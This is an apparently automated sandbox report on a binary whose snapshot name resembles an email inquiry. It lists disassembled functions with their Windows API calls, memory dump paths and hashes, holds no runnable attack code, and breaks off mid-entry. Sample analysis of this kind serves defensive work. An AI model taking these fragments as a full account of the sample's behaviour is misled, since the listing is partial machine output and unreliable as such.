                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: d9b9c47c3193ba8015ec34fa52e40414f912aa55554d19c144c26799bd2bf5f2
                                          • Instruction ID: d1100ddfd8b9f1d794b9b8311f8389e617987ff7add2c77fdf4378a4f66c41a5
                                          • Opcode Fuzzy Hash: d9b9c47c3193ba8015ec34fa52e40414f912aa55554d19c144c26799bd2bf5f2
                                          • Instruction Fuzzy Hash: 99115E79900218FFDB10DFA5CC84E9EBBB4FB48710F204095E904B7290D6716E50DB90
                                          Function 00DF1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00DF12D8
                                          • GetClientRect.USER32(?,?), ref: 00E2B84B
                                          • GetCursorPos.USER32(?), ref: 00E2B855
                                          • ScreenToClient.USER32(?,?), ref: 00E2B860
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 86db477f00d7cd03b165966853417f6374224020c23c2019dc7da666213b3aed
                                          • Instruction ID: 3752cb4e1e59ca604e1c677db3c662806e4b9bb43678a66db1cd1a365d68693d
                                          • Opcode Fuzzy Hash: 86db477f00d7cd03b165966853417f6374224020c23c2019dc7da666213b3aed
                                          • Instruction Fuzzy Hash: 7E11283990011DEFCB04EFA4D8869FE77B8FB05310F018466FA45E7250C730AA958BB9
                                          Function 00E51652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E5166F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E51694
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E5169E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00E501FD,?,00E51250,?,00008000), ref: 00E516D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: 6eb2c4395dc2278f744faef80102ac17b3650c0029f6b050504b5b42292d4cef
                                          • Instruction ID: e264b0ce00d21bbc561779811a99cf39939c8378fb2d8f7f805fddcb2b627c60
                                          • Opcode Fuzzy Hash: 6eb2c4395dc2278f744faef80102ac17b3650c0029f6b050504b5b42292d4cef
                                          • Instruction Fuzzy Hash: C7114831C01518EBCF00AFA6D848BEEBB78FF09752F444495ED44B2240CBB055A8CBA6
                                          Function 00E27207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: cdbcc3682453d63bcd38f1d2efc5333f3b475aa1bb90730bb8a0d877438d3b8a
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 4C01807304415EFBCF125E84EC028EE3F62BF59345B099515FE9868031D237C9B1AB81
                                          Function 00E7B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E7B59E
                                          • ScreenToClient.USER32(?,?), ref: 00E7B5B6
                                          • ScreenToClient.USER32(?,?), ref: 00E7B5DA
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E7B5F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: 2d26346d918d76b3f4f51bd06593398f0016b38d9cb31f40e69b961ae54c63fa
                                          • Instruction ID: 9ac24b32262de7a5ab32e65ea80771f624516f977b8f177a9ccd8deb055c11aa
                                          • Opcode Fuzzy Hash: 2d26346d918d76b3f4f51bd06593398f0016b38d9cb31f40e69b961ae54c63fa
                                          • Instruction Fuzzy Hash: 161146B5D00209EFDB41DF99C844AEEFBB5FB08310F108166E915E3220D735AA558F91
                                          Function 00E7B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E7B8FE
                                          • _memset.LIBCMT ref: 00E7B90D
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EB7F20,00EB7F64), ref: 00E7B93C
                                          • CloseHandle.KERNEL32 ref: 00E7B94E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: 375c40c3920f6e556da4a6acae384414aff98198a5c7949f3e3f0dcf9c1c63ee
                                          • Instruction ID: d90e262a9605e4ad2318a12fa6d4ebed219799ccbd78344b9bf26a9ffed035dc
                                          • Opcode Fuzzy Hash: 375c40c3920f6e556da4a6acae384414aff98198a5c7949f3e3f0dcf9c1c63ee
                                          • Instruction Fuzzy Hash: 4EF054B16443007FE2106B72AC06FBB3A9CEB48354F005020FB4CF5591D771494487AC
                                          Function 00E56E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00E56E88
                                            • Part of subcall function 00E5794E: _memset.LIBCMT ref: 00E57983
                                          • _memmove.LIBCMT ref: 00E56EAB
                                          • _memset.LIBCMT ref: 00E56EB8
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00E56EC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: 3e472ed7138dbb9e82c5619c376fcde6494c032c38c499a4048843cf399f86fe
                                          • Instruction ID: 15fcfaedfda9620484395ac795d77773f34839a776fa28617e94fd698b260c81
                                          • Opcode Fuzzy Hash: 3e472ed7138dbb9e82c5619c376fcde6494c032c38c499a4048843cf399f86fe
                                          • Instruction Fuzzy Hash: 23F0543A104200ABCF01AF55DC85E89BB6AEF49321B048065FE0C6E22BC731E995CBB4
                                          Function 00E7C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF134D
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF135C
                                            • Part of subcall function 00DF12F3: BeginPath.GDI32(?), ref: 00DF1373
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF139C
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E7C030
                                          • LineTo.GDI32(00000000,?,?), ref: 00E7C03D
                                          • EndPath.GDI32(00000000), ref: 00E7C04D
                                          • StrokePath.GDI32(00000000), ref: 00E7C05B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: 53fc284ea9d5eaa10345811524949f9ef8498b38f6e89676dfe24ffc02bedaaf
                                          • Instruction ID: 0d13312d76f7bbe5aa12edaff36a2834224ab37fbb29c0d1f92d424fc14f05f7
                                          • Opcode Fuzzy Hash: 53fc284ea9d5eaa10345811524949f9ef8498b38f6e89676dfe24ffc02bedaaf
                                          • Instruction Fuzzy Hash: B1F0BE31001259FFDB12AF92AC0AFCE3F99AF05310F148100FA19311E2877905A8DBE5
                                          Function 00E4A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E4A399
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E4A3AC
                                          • GetCurrentThreadId.KERNEL32 ref: 00E4A3B3
                                          • AttachThreadInput.USER32(00000000), ref: 00E4A3BA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: d35aa92fe266ac6a3ea7684ecbbc2f8bb881ca1850d71883d686fa79a20901f1
                                          • Instruction ID: b5ee894dc1fa05c041425f9ddad6df7fe6cb1ec48e7888fab3d80f15471358d1
                                          • Opcode Fuzzy Hash: d35aa92fe266ac6a3ea7684ecbbc2f8bb881ca1850d71883d686fa79a20901f1
                                          • Instruction Fuzzy Hash: 66E01571585228BADB209FA2EC0CEDB3F5CEF167A1F048034F509A4060D671C5848BE0
                                          Function 00DF2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00DF2231
                                          • SetTextColor.GDI32(?,000000FF), ref: 00DF223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00DF2250
                                          • GetStockObject.GDI32(00000005), ref: 00DF2258
                                          • GetWindowDC.USER32(?,00000000), ref: 00E2C0D3
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E2C0E0
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00E2C0F9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00E2C112
                                          • GetPixel.GDI32(00000000,?,?), ref: 00E2C132
                                          • ReleaseDC.USER32(?,00000000), ref: 00E2C13D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 7d1044635f87f2f0187273a8efb6ec76509a4317e1a814b306eee69b6f3283e7
                                          • Instruction ID: 2a4ff6142d7536d56efe9c88318d869761c0142c16fd4000837fcb405820f37a
                                          • Opcode Fuzzy Hash: 7d1044635f87f2f0187273a8efb6ec76509a4317e1a814b306eee69b6f3283e7
                                          • Instruction Fuzzy Hash: 1BE03031104144EEDB219F65FC097D83B10AB05336F148366FA6D680E2877149D4DB11
                                          Function 00E48C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 00E48C63
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E4882E), ref: 00E48C6A
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E4882E), ref: 00E48C77
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E4882E), ref: 00E48C7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 553b2e9da291a8a121da9285746516fa2d1b28616f3beba0db78c38e7b4605cb
                                          • Instruction ID: 24df3ea4c94ac01a4215e7639cda1b4d175aa79ecf4471d672d97ed21d7a807a
                                          • Opcode Fuzzy Hash: 553b2e9da291a8a121da9285746516fa2d1b28616f3beba0db78c38e7b4605cb
                                          • Instruction Fuzzy Hash: E3E08636A42211EFD7209FB26E0CB5A7BACFF50797F054828F249EA050DA3484C9CB61
                                          Function 00E32187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E32187
                                          • GetDC.USER32(00000000), ref: 00E32191
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E321B1
                                          • ReleaseDC.USER32(?), ref: 00E321D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 81c86b2dc56fed90d888f8df99eb9342c69c1032f5a77e2540432698b3003d22
                                          • Instruction ID: b55bc0b5d4460c220bf897069e024c7e2fe0434eca531368be0552405b0bc9a8
                                          • Opcode Fuzzy Hash: 81c86b2dc56fed90d888f8df99eb9342c69c1032f5a77e2540432698b3003d22
                                          • Instruction Fuzzy Hash: CDE0E575804208EFDB019FA1D908AAD7BB1EB4C350F118429FA5AA7220CB7881869F90
                                          Function 00E3219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E3219B
                                          • GetDC.USER32(00000000), ref: 00E321A5
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E321B1
                                          • ReleaseDC.USER32(?), ref: 00E321D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: a15b1a58e9bb5f9b8f5dd7a165226b0a5f79c5511f0da001d82ca491039d1e50
                                          • Instruction ID: 75f1129b4b212deceee43eb26a99c79d46730b0246f455774b07f9e70f0a44b6
                                          • Opcode Fuzzy Hash: a15b1a58e9bb5f9b8f5dd7a165226b0a5f79c5511f0da001d82ca491039d1e50
                                          • Instruction Fuzzy Hash: A9E0E575804208AFCB019FA1D8086AD7BA1EB4C310F118025F95AA7220CB7891859F90
                                          Function 00DF63A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2291192146
                                          • Opcode ID: d7ef6a595d76ac96315d9689c7cf93235aacacc3bb48fffdfaea970c91854da2
                                          • Instruction ID: ffd48995d1de5f09f5d205d4d48d29f3efa0002fd53d3a9443a59807288ce315
                                          • Opcode Fuzzy Hash: d7ef6a595d76ac96315d9689c7cf93235aacacc3bb48fffdfaea970c91854da2
                                          • Instruction Fuzzy Hash: EAB19D7180420DAACF14EF98C8819FEB7B5EF44310F56C06AEB42A7695DA30DE85CB71
                                          Function 00E6B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __itow_s
                                          • String ID: xr$xr
                                          • API String ID: 3653519197-2528877900
                                          • Opcode ID: 4e3f2bae5f428ef51a062cc65c82f6304ffb9cb7ddab50fd136709ba6d50744b
                                          • Instruction ID: 72a96a91174b07d13276ae680c57cf35dc01ba2662bf0989500827b019ca4f01
                                          • Opcode Fuzzy Hash: 4e3f2bae5f428ef51a062cc65c82f6304ffb9cb7ddab50fd136709ba6d50744b
                                          • Instruction Fuzzy Hash: 5EB18E70A40109ABCB14DF54D891EFAB7B9EF58344F149459FA45EB292EB30E981CB60
                                          Function 00E5B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • __wcsnicmp.LIBCMT ref: 00E5B298
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E5B361
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: b5f1d2f90bee764537e2acf7b08b2d6181bc8545cbbd3eeb73ba311fa77bd58d
                                          • Instruction ID: 895ca15f584755119fbd118a0cd73eacd72fe7eaa75661eba43bc75fd74c1661
                                          • Opcode Fuzzy Hash: b5f1d2f90bee764537e2acf7b08b2d6181bc8545cbbd3eeb73ba311fa77bd58d
                                          • Instruction Fuzzy Hash: 43616E75E00219AFCB14DF94C891EAEB7B4EB08315F119469F946BB291DB70AE84CB60
                                          Function 00E38A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
